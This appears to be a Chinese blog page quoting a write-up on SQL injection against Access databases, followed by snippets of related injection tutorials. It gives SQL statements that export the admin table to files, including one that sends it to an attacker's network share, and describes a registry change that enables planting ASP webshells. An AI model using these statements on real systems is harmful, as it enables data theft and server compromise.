目前有一種在access資料庫下匯出webshell的方法,這個方法是由lake2兄弟提出來的,下面就是我引用他這篇文章的原文:
已經聽n個人過說有人已經發現sql注入access得到webshell的技術了,也只是聽說而已,具體的細節還是不得而知。
最近在看的書中一章提到jet的安全,然後靈光一閃,呵呵,發現了一種可以利用access匯出asp的方法,分享之。
幾個月之前網上就流傳利用sql注入access匯出資料庫內容到文字檔案(可匯出txt、htm、html等格式)的方法:
select * into [test.txt] in 'd:/web/' 'text;' from admin
執行上述語句,在d:/web目錄下就會生成test.txt檔案,其內容就是表admin的內容。但是匯出asp格式就不行,會說「不能更新,資料庫或物件為唯讀」。
其實控制匯出檔案字尾是儲存在登錄檔的,具體鍵值是hkey_localmachine/software/microsoft/jet/4.0/engines/text/disableextension,預設情況下值為「!txt,csv,tab,asc,tmp,htm,html」,如果我們把asp也新增進去的話,呵呵,就可以匯出asp格式的檔案了。
這個方法跟那個呼叫access的shell函式執行命令一樣,要修改登錄檔,所以利用不是很大。
順便提一下,前面提到的匯出文字檔案的方法如果不知道web路徑貌似可以匯出到自己機器的哦:select * into [test.txt] in '//yourip/share' 'text;' from admin
上面的方法雖然比較好,但是要操作登錄檔,似乎在我們入侵的過程中該方法並沒有太大的利用價值,不過對於我們研究技術的來說,這也是乙個很好的突破哦,搞技術就是要創新嘛。
SQL注入實戰 防注入 Access
這道題目算是給了sql注入另外的思路了。一般而言我們測試sql注入會選擇那些有直接顯示的地方 比如id 1,name 但這會侷限你的思維,所以一定要多多培養做題的思路才能應對各種情況。下面會給出不一樣的思路 1.這是墨者學院一道有waf的sql注入,有很多人遇到有waf的環境就感覺頭大,確實繞waf...
SQL注入之ACCESS注入筆記
以.mdb字尾命名 乙個檔案就是乙個庫,和mysql不同 開啟方式用office或者第三方工具 表名 欄位名 資料內容step1 判斷注入是否存在 step2 猜解表名 step3 猜解字段數 step4 猜解欄位名 step5 猜解內容長度 step6 猜解內容 單引號報錯,因為在sql語句中單引...
新手 SQL注入篇 Access注入
開局絮叨 幾經波折,開始靜下心來學習。並且申請了知乎專欄,做一些日常學習整理的筆記和一些技巧。留給未來的我,和懂的欣賞的人閱讀。做筆記的確是個好習慣,因為在全世界上萬人中也就有其中那麼些少數人能擁有過目不忘的本領。加油!路還長。0x1 sql注入篇 access注入 當初接觸這個坑的時候就是從注入 ...